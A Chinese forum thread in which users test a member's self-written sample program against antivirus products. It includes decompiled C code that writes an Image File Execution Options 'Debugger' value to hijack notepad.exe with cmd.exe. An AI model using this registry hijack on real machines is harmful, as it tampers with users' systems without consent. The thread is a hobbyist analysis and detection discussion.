自己写的小程序哈哈，大家测试下

sungrass

我什么时候也能贬黜一个程序就好了

◥潶⊙马◤

改了下兼容性，新的程序应该可以兼容XP了吧

voldemort12138

◥潶⊙马◤ 发表于 2013-4-4 17:51
改了下兼容性，新的程序应该可以兼容XP了吧

xp32下双击没反应，既不弹框，也不显示主界面

◥潶⊙马◤

voldemort12138 发表于 2013-4-4 18:02
xp32下双击没反应，既不弹框，也不显示主界面

XP现在貌似被微软给扔了

voldemort12138

◥潶⊙马◤ 发表于 2013-4-5 16:33
XP现在貌似被微软给扔了

可是win7我装不了，只好用xp

zhq445078388

int __cdecl sub_4015C0()
{
  DWORD dwDisposition; // [sp+0h] [bp-8h]@1
  HKEY hKey; // [sp+4h] [bp-4h]@1

  hKey = 0;
  dwDisposition = 1;
  if ( !RegCreateKeyExA(
          HKEY_LOCAL_MACHINE,
          "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe",
          0,
          0,
          0,
          6u,
          0,
          &hKey,
          &dwDisposition) )
    RegSetValueExA(hKey, "Debugger", 0, 1u, "cmd.exe", 7u);
  RegCloseKey(hKey);
  return 0;
}
映像挟持..果然是这个地方啊..我还以为是某些没被发现的地方

a22271001

微点：
劫持笔记本：
程序：
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\MY DOCUMENTS\DOWNLOADS\TEST.EXE
是否删除木马程序及其衍生物?
添加用户：
无反应
左右键调换：
无反应
u盘没测

limy

卡巴好像都没什么反应，无语了

◥潶⊙马◤

zhq445078388 发表于 2013-4-24 18:06
int __cdecl sub_4015C0()
{
  DWORD dwDisposition; // [sp+0h] @1

用反汇编工具弄的?代码相似度80%吧,差不多就是这样的,调用那个RegCreateKey的API就可以了.但是这些API是删除不了驱动级的杀毒软件的自我保护的,所以真正的病毒要厉害的多